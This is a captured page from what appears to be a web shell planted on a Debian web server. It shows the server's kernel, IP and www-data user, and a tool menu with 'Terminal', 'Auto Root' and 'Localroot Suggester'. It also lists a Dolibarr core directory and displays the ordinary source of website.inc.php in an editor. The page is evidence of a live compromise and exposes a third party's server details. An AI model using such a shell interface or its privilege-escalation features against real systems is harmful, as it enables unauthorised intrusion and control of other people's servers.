Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
bdc.bdcloud.fr /
core /
Delete
Unzip
Name
Size
Permission
Date
Action
ajax
[ DIR ]
drwxr-x---
2025-11-08 11:17
boxes
[ DIR ]
drwxr-x---
2025-11-08 11:17
class
[ DIR ]
drwxr-x---
2025-11-08 11:17
data
[ DIR ]
drwxr-x---
2025-11-08 11:17
db
[ DIR ]
drwxr-x---
2025-11-08 11:17
filemanagerdol
[ DIR ]
drwxr-x---
2025-11-08 11:17
js
[ DIR ]
drwxr-x---
2025-11-08 11:17
lib
[ DIR ]
drwxr-x---
2025-11-08 11:17
login
[ DIR ]
drwxr-x---
2025-11-08 11:17
menus
[ DIR ]
drwxr-x---
2025-11-08 11:17
modules
[ DIR ]
drwxr-x---
2025-11-08 11:17
tpl
[ DIR ]
drwxr-x---
2025-11-08 11:17
triggers
[ DIR ]
drwxr-x---
2025-11-08 11:17
actions_addupdatedelete.inc.php
19.57
KB
-rwxr-x---
2023-04-04 15:51
actions_builddoc.inc.php
5.57
KB
-rwxr-x---
2023-04-04 15:51
actions_changeselectedfields.inc.php
1.57
KB
-rwxr-x---
2023-04-04 15:51
actions_comments.inc.php
2.55
KB
-rwxr-x---
2023-04-04 15:51
actions_dellink.inc.php
2.58
KB
-rwxr-x---
2023-04-04 15:51
actions_extrafields.inc.php
12.82
KB
-rwxr-x---
2023-04-04 15:51
actions_fetchobject.inc.php
1.89
KB
-rwxr-x---
2023-04-04 15:51
actions_lineupdown.inc.php
2.57
KB
-rwxr-x---
2023-04-04 15:51
actions_linkedfiles.inc.php
12.3
KB
-rwxr-x---
2023-04-04 15:51
actions_massactions.inc.php
60.59
KB
-rwxr-x---
2023-04-04 15:51
actions_printing.inc.php
3.29
KB
-rwxr-x---
2023-04-04 15:51
actions_sendmails.inc.php
19.03
KB
-rwxr-x---
2023-04-04 15:51
actions_setmoduleoptions.inc.php
5.35
KB
-rwxr-x---
2023-04-04 15:51
actions_setnotes.inc.php
3.63
KB
-rwxr-x---
2023-04-04 15:51
antispamimage.php
1.9
KB
-rwxr-x---
2023-04-04 15:51
bookmarks_page.php
6.11
KB
-rwxr-x---
2023-04-04 15:51
commonfieldsinexport.inc.php
2.01
KB
-rwxr-x---
2023-04-04 15:51
commonfieldsinimport.inc.php
2.01
KB
-rwxr-x---
2023-04-04 15:51
datepicker.php
9.51
KB
-rwxr-x---
2023-04-04 15:51
doxygen.php
1.71
KB
-rwxr-x---
2023-04-04 15:51
extrafieldsinexport.inc.php
2.88
KB
-rwxr-x---
2023-04-04 15:51
extrafieldsinimport.inc.php
2.89
KB
-rwxr-x---
2023-04-04 15:51
get_info.php
8.05
KB
-rwxr-x---
2023-04-04 15:51
get_menudiv.php
8.22
KB
-rwxr-x---
2023-04-04 15:51
multicompany_page.php
5.21
KB
-rwxr-x---
2023-04-04 15:50
photos_resize.php
23.19
KB
-rwxr-x---
2023-04-04 15:50
search.php
4.95
KB
-rwxr-x---
2023-04-04 15:50
search_page.php
4.96
KB
-rwxr-x---
2023-04-04 15:50
tools.php
1.59
KB
-rwxr-x---
2023-04-04 15:50
website.inc.php
11.85
KB
-rwxr-x---
2023-04-04 15:50
Save
Rename
<?php /* Copyright (C) 2017-2019 Laurent Destailleur <eldy@users.sourceforge.net> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. * or see https://www.gnu.org/ */ /** * \file htdocs/core/website.inc.php * \brief Common file loaded by all website pages (after master.inc.php). It set the new object $weblangs, using parameter 'l'. * This file is included in top of all container pages and is run only when a web page is called. * The global variable $websitekey must be defined. */ // Load website class include_once DOL_DOCUMENT_ROOT.'/website/class/website.class.php'; include_once DOL_DOCUMENT_ROOT.'/website/class/websitepage.class.php'; $website = null; $websitepage = null; $weblangs = null; $pagelangs = null; // Detection browser (copy of code from main.inc.php) if (isset($_SERVER["HTTP_USER_AGENT"]) && is_object($conf) && empty($conf->browser->name)) { $tmp = getBrowserInfo($_SERVER["HTTP_USER_AGENT"]); $conf->browser->name = $tmp['browsername']; $conf->browser->os = $tmp['browseros']; $conf->browser->version = $tmp['browserversion']; $conf->browser->layout = $tmp['layout']; // 'classic', 'phone', 'tablet' //var_dump($conf->browser); if ($conf->browser->layout == 'phone') { $conf->dol_no_mouse_hover = 1; } } // Define $website if (!is_object($website)) { $website = new Website($db); $website->fetch(0, $websitekey); } // Define $websitepage if we have $websitepagefile defined if (!$pageid && !empty($websitepagefile)) { $pageid = str_replace(array('.tpl.php', 'page'), array('', ''), basename($websitepagefile)); if ($pageid == 'index.php') { $pageid = $website->fk_default_home; } } if (!is_object($websitepage)) { $websitepage = new WebsitePage($db); } // Define $weblangs if (!is_object($weblangs)) { $weblangs = new Translate('', $conf); } if (!is_object($pagelangs)) { $pagelangs = new Translate('', $conf); } if ($pageid > 0) { $websitepage->fetch($pageid); $weblangs->setDefaultLang(GETPOSTISSET('lang') ? GETPOST('lang', 'aZ09') : (empty($_COOKIE['weblangs-shortcode']) ? 'auto' : preg_replace('/[^a-zA-Z0-9_\-]/', '', $_COOKIE['weblangs-shortcode']))); $pagelangs->setDefaultLang($websitepage->lang ? $websitepage->lang : $weblangs->shortlang); if (!defined('USEDOLIBARREDITOR') && (in_array($websitepage->type_container, array('menu', 'other')) || empty($websitepage->status) && !defined('USEDOLIBARRSERVER'))) { $weblangs->load("website"); // Security options // X-Content-Type-Options header("X-Content-Type-Options: nosniff"); // X-Frame-Options if (empty($websitepage->allowed_in_frames) && empty($conf->global->WEBSITE_ALLOW_FRAMES_ON_ALL_PAGES)) { header("X-Frame-Options: SAMEORIGIN"); } //httponly_accessforbidden('<center><br><br>'.$weblangs->trans("YouTryToAccessToAFileThatIsNotAWebsitePage", $websitepage->pageurl, $websitepage->type_container, $websitepage->status).'</center>', 404, 1); http_response_code(404); print '<center><br><br>'.$weblangs->trans("YouTryToAccessToAFileThatIsNotAWebsitePage", $websitepage->pageurl, $websitepage->type_container, $websitepage->status).'</center>'; exit; } } if (!defined('USEDOLIBARRSERVER') && !defined('USEDOLIBARREDITOR')) { // Security options // X-Content-Type-Options header("X-Content-Type-Options: nosniff"); // X-Frame-Options if (empty($websitepage->allowed_in_frames) && empty($conf->global->WEBSITE_ALLOW_FRAMES_ON_ALL_PAGES)) { header("X-Frame-Options: SAMEORIGIN"); } // X-XSS-Protection //header("X-XSS-Protection: 1"); // XSS filtering protection of some browsers (note: use of Content-Security-Policy is more efficient). Disabled as deprecated. // Content-Security-Policy-Report-Only if (!defined('WEBSITE_MAIN_SECURITY_FORCECSPRO')) { // A default security policy that keep usage of js external component like ckeditor, stripe, google, working // For example: to restrict to only local resources, except for css (cloudflare+google), and js (transifex + google tags) and object/iframe (youtube) // default-src 'self'; style-src: https://cdnjs.cloudflare.com https://fonts.googleapis.com; script-src: https://cdn.transifex.com https://www.googletagmanager.com; object-src https://youtube.com; frame-src https://youtube.com; img-src: *; // For example, to restrict everything to itself except img that can be on other servers: // default-src 'self'; img-src *; // Pre-existing site that uses too much js code to fix but wants to ensure resources are loaded only over https and disable plugins: // default-src https: 'unsafe-inline' 'unsafe-eval'; object-src 'none' // // $contentsecuritypolicy = "frame-ancestors 'self'; img-src * data:; font-src *; default-src 'self' 'unsafe-inline' 'unsafe-eval' *.paypal.com *.stripe.com *.google.com *.googleapis.com *.google-analytics.com *.googletagmanager.com;"; // $contentsecuritypolicy = "frame-ancestors 'self'; img-src * data:; font-src *; default-src *; script-src 'self' 'unsafe-inline' *.paypal.com *.stripe.com *.google.com *.googleapis.com *.google-analytics.com *.googletagmanager.com; style-src 'self' 'unsafe-inline'; connect-src 'self';"; $contentsecuritypolicy = getDolGlobalString('WEBSITE_MAIN_SECURITY_FORCECSPRO'); if (!is_object($hookmanager)) { $hookmanager = new HookManager($db); } $hookmanager->initHooks(array("main")); $parameters = array('contentsecuritypolicy'=>$contentsecuritypolicy, 'mode'=>'reportonly'); $result = $hookmanager->executeHooks('setContentSecurityPolicy', $parameters); // Note that $action and $object may have been modified by some hooks if ($result > 0) { $contentsecuritypolicy = $hookmanager->resPrint; // Replace CSP } else { $contentsecuritypolicy .= $hookmanager->resPrint; // Concat CSP } if (!empty($contentsecuritypolicy)) { header("Content-Security-Policy-Report-Only: ".$contentsecuritypolicy); } } // Content-Security-Policy if (!defined('WEBSITE_MAIN_SECURITY_FORCECSP')) { // A default security policy that keep usage of js external component like ckeditor, stripe, google, working // For example: to restrict to only local resources, except for css (cloudflare+google), and js (transifex + google tags) and object/iframe (youtube) // default-src 'self'; style-src: https://cdnjs.cloudflare.com https://fonts.googleapis.com; script-src: https://cdn.transifex.com https://www.googletagmanager.com; object-src https://youtube.com; frame-src https://youtube.com; img-src: *; // For example, to restrict everything to itself except img that can be on other servers: // default-src 'self'; img-src *; // Pre-existing site that uses too much js code to fix but wants to ensure resources are loaded only over https and disable plugins: // default-src https: 'unsafe-inline' 'unsafe-eval'; object-src 'none' // // $contentsecuritypolicy = "frame-ancestors 'self'; img-src * data:; font-src *; default-src 'self' 'unsafe-inline' 'unsafe-eval' *.paypal.com *.stripe.com *.google.com *.googleapis.com *.google-analytics.com *.googletagmanager.com;"; // $contentsecuritypolicy = "frame-ancestors 'self'; img-src * data:; font-src *; default-src *; script-src 'self' 'unsafe-inline' *.paypal.com *.stripe.com *.google.com *.googleapis.com *.google-analytics.com *.googletagmanager.com; style-src 'self' 'unsafe-inline'; connect-src 'self';"; $contentsecuritypolicy = getDolGlobalString('WEBSITE_MAIN_SECURITY_FORCECSP'); if (!is_object($hookmanager)) { $hookmanager = new HookManager($db); } $hookmanager->initHooks(array("main")); $parameters = array('contentsecuritypolicy'=>$contentsecuritypolicy, 'mode'=>'active'); $result = $hookmanager->executeHooks('setContentSecurityPolicy', $parameters); // Note that $action and $object may have been modified by some hooks if ($result > 0) { $contentsecuritypolicy = $hookmanager->resPrint; // Replace CSP } else { $contentsecuritypolicy .= $hookmanager->resPrint; // Concat CSP } if (!empty($contentsecuritypolicy)) { header("Content-Security-Policy: ".$contentsecuritypolicy); } } // Referrer-Policy if (!defined('WEBSITE_MAIN_SECURITY_FORCERP')) { // The constant WEBSITE_MAIN_SECURITY_FORCERP should never be defined by page, but the variable used just after may be // For public web sites, we use the same default value than "strict-origin-when-cross-origin" $referrerpolicy = getDolGlobalString('WEBSITE_MAIN_SECURITY_FORCERP', "strict-origin-when-cross-origin"); header("Referrer-Policy: ".$referrerpolicy); } // Strict-Transport-Security if (!defined('WEBSITE_MAIN_SECURITY_FORCESTS')) { // The constant WEBSITE_MAIN_SECURITY_FORCESTS should never be defined by page, but the variable used just after may be // Example: "max-age=31536000; includeSubDomains" $sts = getDolGlobalString('WEBSITE_MAIN_SECURITY_FORCESTS'); if (!empty($sts)) { header("Strict-Transport-Security: ".$sts); } } // Permissions-Policy (old name was Feature-Policy) if (!defined('WEBSITE_MAIN_SECURITY_FORCEPP')) { // The constant WEBSITE_MAIN_SECURITY_FORCEPP should never be defined by page, but the variable used just after may be // Example: "camera: 'none'; microphone: 'none';" $pp = getDolGlobalString('WEBSITE_MAIN_SECURITY_FORCEPP'); if (!empty($pp)) { header("Permissions-Policy: ".$pp); } } } // A lang was forced, so we change weblangs init if (GETPOST('l', 'aZ09')) { $weblangs->setDefaultLang(GETPOST('l', 'aZ09')); } // A lang was forced, so we check to find if we must make a redirect on translation page if ($_SERVER['PHP_SELF'] != DOL_URL_ROOT.'/website/index.php') { // If we browsing page using Dolibarr server or a Native web server //print_r(get_defined_constants(true));exit; if (GETPOST('l', 'aZ09')) { $sql = "SELECT wp.rowid, wp.lang, wp.pageurl, wp.fk_page"; $sql .= " FROM ".MAIN_DB_PREFIX."website_page as wp"; $sql .= " WHERE wp.fk_website = ".((int) $website->id); $sql .= " AND (wp.fk_page = ".((int) $pageid)." OR wp.rowid = ".((int) $pageid); if (is_object($websitepage) && $websitepage->fk_page > 0) { $sql .= " OR wp.fk_page = ".((int) $websitepage->fk_page)." OR wp.rowid = ".((int) $websitepage->fk_page); } $sql .= ")"; $sql .= " AND wp.lang = '".$db->escape(GETPOST('l', 'aZ09'))."'"; $resql = $db->query($sql); if ($resql) { $obj = $db->fetch_object($resql); if ($obj) { $newpageid = $obj->rowid; if ($newpageid != $pageid) { // To avoid to make a redirect on same page (infinite loop) if (defined('USEDOLIBARRSERVER')) { header("Location: ".DOL_URL_ROOT.'/public/website/index.php?website='.$websitekey.'&pageid='.$newpageid.'&l='.GETPOST('l', 'aZ09')); exit; } else { $newpageref = $obj->pageurl; header("Location: ".(($obj->lang && $obj->lang != $website->lang) ? '/'.$obj->lang.'/' : '/').$newpageref.'.php?l='.GETPOST('l', 'aZ09')); exit; } } } } } } // Show off line message when all website is off if (!defined('USEDOLIBARREDITOR') && empty($website->status)) { // Security options // X-Content-Type-Options header("X-Content-Type-Options: nosniff"); // X-Frame-Options if (empty($websitepage->allowed_in_frames) && empty($conf->global->WEBSITE_ALLOW_FRAMES_ON_ALL_PAGES)) { header("X-Frame-Options: SAMEORIGIN"); } $weblangs->load("website"); //httponly_accessforbidden('<center><br><br>'.$weblangs->trans("SorryWebsiteIsCurrentlyOffLine").'</center>', 503, 1); http_response_code(503); print '<center><br><br>'.$weblangs->trans("SorryWebsiteIsCurrentlyOffLine").'</center>'; exit; }